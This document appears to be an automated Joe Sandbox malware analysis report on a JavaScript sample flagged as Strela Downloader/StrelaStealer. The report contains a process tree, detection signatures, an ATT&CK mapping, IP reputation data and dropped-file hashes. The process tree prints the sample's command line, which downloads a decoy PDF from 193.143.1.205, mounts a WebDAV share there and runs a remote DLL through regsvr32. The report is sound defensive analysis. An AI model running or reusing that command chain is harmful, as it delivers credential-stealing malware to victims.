Windows
Analysis Report
183751298714312883.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7496 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\18375 1298714312 883.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7584 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\397 8138462382 7.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7592 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7636 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7828 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 8060 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7292 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 88 --field -trial-han dle=1652,i ,583551259 6297879040 ,799498974 4152052749 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 8124 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
8% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588715 |
Start date and time: | 2025-01-11 04:33:50 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 16s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 183751298714312883.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/63@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 172.64.41.3, 162.159.61.3, 184.28.90.27, 23.209.209.135, 199.232.214.172, 2.16.168.107, 2.16.168.105, 23.46.156.6, 23.46.156.41, 23.46.156.40, 23.46.156.42, 23.46.156.55, 23.46.156.47, 23.46.156.45, 23.46.156.39, 23.46.156.12, 192.168.2.9, 54.224.241.105, 52.149.20.212, 23.41.168.139
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
22:34:50 | API Interceptor | |
22:34:55 | API Interceptor | |
22:34:55 | API Interceptor | |
22:35:02 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.4932028503222312 |
Encrypted: | false |
SSDEEP: | 1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaX:cJhXC9lHmutpJyiRDeJ/aUKrDgnmR |
MD5: | E1537940EBF27C7C548CD37577895D99 |
SHA1: | 92C7A81C78BA28CD0B1D6FB6B8F44F4AB012CE90 |
SHA-256: | 44BE39F5693575469675B154CD3BC02E21D5D9321C7471B7607D3AD9F8C7A1A2 |
SHA-512: | E6183990088DAE3C00F2A5AB53F6BAD854919B53D048914358BADD463C3225E2BFBB69E8039F88E0DC712F72CB398A7C438336473B2AA0BE672DAF47BDDD01A4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.72169602557758 |
Encrypted: | false |
SSDEEP: | 1536:jSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:jazaNvFv8V2UW/DLzN/w4wZi |
MD5: | 98CB43723D734F16FC54BAD4F6A8624C |
SHA1: | ECEF021A672C5B53A7598597F9D5615AFA8064B1 |
SHA-256: | 42575D648BC41CE6267E1E61455D5C8EBA943885DC2954CBBB8A6C6FF13E3F64 |
SHA-512: | 7DBA2922ACEB8CC1EF95C3AF20D1874D9CFC813935B4D97194C1787DB2F227B6C7831C6A1479E07007BC65478510651997C1223DD294400B1ACBF79A1F345CF4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08127381332794957 |
Encrypted: | false |
SSDEEP: | 3:y/lEYelDBvT/fgsCrZClW/t/iwYll+SHY/Xl+/rQLve:CyzlDZLfgs3GlilAS4M |
MD5: | 2FA891FD40BF7E13D4D398805DB80AA6 |
